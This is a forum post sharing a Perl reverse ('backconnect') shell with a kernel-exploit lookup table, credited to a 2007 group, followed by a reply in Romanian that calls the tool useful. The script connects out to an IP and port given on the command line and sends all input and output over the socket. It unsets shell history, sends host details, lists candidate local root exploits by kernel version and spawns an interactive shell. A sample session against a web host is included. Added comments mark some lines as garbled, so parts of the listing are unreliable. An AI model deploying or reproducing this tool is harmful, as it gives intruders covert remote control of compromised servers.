zbeng

[PERL] - BackConnectShell + Rootlab t00l


#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# [email]3sk0rbut0@gmail.com[/email]
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA

# ******* ConnectBack Shell *******

# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest

# Kernel local:
# 2.6.9-022stab078.14-smp

# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$

use IO::Socket;
use Socket;
use FileHandle;

# Path of the shell that the last line of the script starts with system($system).
$system = '/bin/bash';
# Usage guard: only the first argument (the remote host) is tested. A missing
# port argument is not caught here and reaches sockaddr_in() undefined.
if(!$ARGV[0])
{
print "\nBackConnect Shell - D.O.M TEAM\n\n";
print "Usage: perl $0 [IPHOST] [NCPORT]\n";
print "Example: perl $0 82.85.55.21 6850\n\n";
exit;
}

# Opens an outbound TCP connection from this host to the address and port given
# on the command line. Because the connection is initiated from the inside, it
# is not stopped by inbound-only filtering; egress filtering and monitoring of
# outbound connections made by service accounts are the relevant controls.
# `die print ...` evaluates print first (message goes to STDOUT), then dies
# with print's return value rather than with the message text.
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket\n";
# These four status lines are printed unconditionally, before the descriptors
# are redirected, so they go to the launching process's original STDOUT
# (for example a web server response or log), not to the socket.
print "[+] BackConnect Shell\n";
print "[+] Conectando a $ARGV[0]... \n";
print "[+] Enviando Shell... \n";
print "[+] Conectado. \n";
SOCKET->autoflush();
# STDIN, STDOUT and STDERR are all re-opened as duplicates of the socket.
# Detection note: a perl process whose descriptors 0, 1 and 2 all refer to the
# same TCP socket is a strong reverse-shell indicator (visible in /proc/<pid>/fd
# or lsof output). The return values of these open() calls are not checked.
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
# From here on every print and every child process writes to the remote peer.
print "\n******* ConnectBack Shell *******\n\n";
# Runs one shell command line that unsets history variables and collects host
# details (kernel version, user, groups, logged-in users, working directory).
# Detection note: this exact command string shows up as an `sh -c` argument in
# process-execution telemetry. Since shell history is targeted, investigators
# should rely on exec auditing rather than history files.
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");

# Rootkernel

# Captures the running kernel release string by spawning `uname -r`; it is the
# value the lookup loop further down compares against its version table.
my $khost = `uname -r`;
chomp($khost);
# STDOUT is the socket at this point, so the kernel release is sent to the peer.
print "\nKernel local: $khost\n\n";

# Lookup table: each entry names a local privilege-escalation exploit and lists
# the kernel version prefixes the authors associated with it. Entries such as
# '2.4.' or '2.6.' cover a whole kernel series, so the output is a coarse
# guess, not a verified vulnerability check.
# Defender note: every version listed is a 2.2/2.4/2.6-era kernel; a host whose
# `uname -r` matches any of them is long out of support and should be treated
# as a patching finding in its own right.
# NOTE(review): the left-hand side `$hsd_'name'` appears garbled by page
# extraction and is not the hash `%h` declared on the next line; as printed,
# these statements never fill %h, which is the hash the lookup loop iterates.
# Confirm against an original copy before relying on this listing.
my %h;
$hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };
$hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$hsd_'ave' = { vuln=>['2.4.19','2.4.20'] };
$hsd_'elflbl' = { vuln=>['2.4.29'] };
$hsd_'elfdump' = { vuln=>['2.4.27'] };
$hsd_'expand_stack' = { vuln=>['2.4.29'] };
$hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$hsd_'kdump' = { vuln=>['2.6.13'] };
$hsd_'km2' = { vuln=>['2.4.18','2.4.22'] };
$hsd_'krad' = { vuln=>['2.6.11'] };
$hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] };
$hsd_'local26' = { vuln=>['2.6.13'] };
$hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] };
$hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] };
$hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace24' = { vuln=>['2.4.9'] };
$hsd_'pwned' = { vuln=>['2.4.','2.6.'] };
$hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
# '2.6.13' is listed twice in the next entry.
$hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$hsd_'remap' = { vuln=>['2.4.'] };
$hsd_'rip' = { vuln=>['2.2.'] };
$hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] };
$hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$hsd_'newsmp' = { vuln=>['2.6.'] };
$hsd_'smpracer' = { vuln=>['2.4.29'] };
$hsd_'loginx' = { vuln=>['2.4.22'] };
$hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$hsd_'prctl' = { vuln=>['2.6.'] };
$hsd_'kmdx' = { vuln=>['2.6.','2.4.'] };

# Invokes the lookup once. The `&name;` form without parentheses passes the
# caller's current @_ through; the sub does not read its arguments.
&busca;
# busca ("search"): compares the kernel release in the file-scoped $khost with
# every version prefix stored under each key of %h and prints one
# "P0sible 3xploit: <name>" line per match. Takes no parameters and returns
# nothing meaningful; its only effect is the printed output, which goes to the
# socket because STDOUT was redirected earlier.
# Detection note: the literal "P0sible 3xploit: " prefix is a stable string to
# look for in captured traffic or in copies of the script on disk.
sub busca {
foreach my $key(keys %h){

# NOTE(review): the list expression below appears garbled by page extraction
# (the same damage as in the table assignments); presumably it dereferences the
# 'vuln' array stored for $key. Confirm against an original copy.
foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){

# The table entry is interpolated as a regex anchored at the start of the
# release string. Its dots are unescaped, so each '.' matches any character and
# the comparison is looser than a literal prefix match.
if($khost=~/^$kernel/){
# Strips a trailing '.' from the loop variable after the match; the value is
# not used again in this iteration, so this does not change what is printed.
chop($kernel) if ($kernel=~/\.$/);
print "P0sible 3xploit: ". $key ."\n";
}
}
}
}
print "\n";
# Starts an interactive `sh -i` whose stdin/stdout/stderr are the inherited
# socket descriptors, handing the remote peer a shell under the account that
# ran this script (the sample session in the header shows uid apache).
# Detection note: `sh -i` or bash running as a child of perl under a web server
# account, with a network socket as its terminal, is a high-confidence alert
# condition for process-lineage monitoring.
system 'export TERM=xterm;exec sh -i';
# Runs only after the interactive sh above has exited: launches the shell named
# in $system (/bin/bash) on the same descriptors.
system($system);


Guest flama

foarte interesant ... cred ca ai greshit totushi sectziunea acesta fiind coltzul programatorilor ... shi cum nu tu ai programat ... mai potrivit era hack tools. iti sugerez sa il mutzi, sa iti dai warn shi sa iti tragi shi 2 palme peste fund. oricum e usefull toolu gg.
